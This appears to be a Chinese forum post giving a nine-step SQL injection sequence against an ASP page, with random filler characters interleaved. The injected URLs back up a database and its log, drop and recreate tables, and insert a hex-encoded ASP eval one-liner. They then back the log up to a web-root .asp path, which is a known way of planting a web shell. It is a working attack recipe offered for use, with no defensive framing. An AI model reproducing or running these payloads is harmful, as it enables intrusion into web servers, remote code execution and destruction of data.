第一步
* r. [: X' z+ I$ L' b2 Ihttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--% k8 ~/ J4 H2 s. i0 x
+ K; h" m, [# {7 t3 q; Z第二步:* L9 U% V# Q% w9 E& Y% Z
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
! R0 T/ B2 t' p, f6 f# s
9 h: L. m; j5 L4 z第三步
6 L1 W0 h- b" {/ m8 Ohttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
( J+ P. M* v- {. l
) W+ y- }% O! d$ @第四步2 W6 h( E3 z k
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
N; y+ V4 v' t# J) G
- F7 D4 A) j& d6 x5 H0 ?, ?# i2 Q2 a第五步8 c( a/ W3 _# \; a6 i
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
' j! R" L; P- H
( L2 R4 `& A6 R/ v: u. R第六步- [( R4 {& c" v+ G9 R7 X
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
* S w$ C* u; U5 e; ?. n# ` o0 z
第七步
* ^3 d) }% L+ n0 t1 o1 n( ?http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
7 w4 D# x' R; w: z) i% e F% O
: `) A# Z% d& h5 l3 A第八步
4 z [) r1 n- I# u- Mhttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--6 W3 l. r |& Q4 z9 t! N: [
% B9 F$ q% p3 M3 Z& L1 u; |
第九步
& z) h/ f& U; s0 Bhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
1 v8 E5 |& K4 {9 I |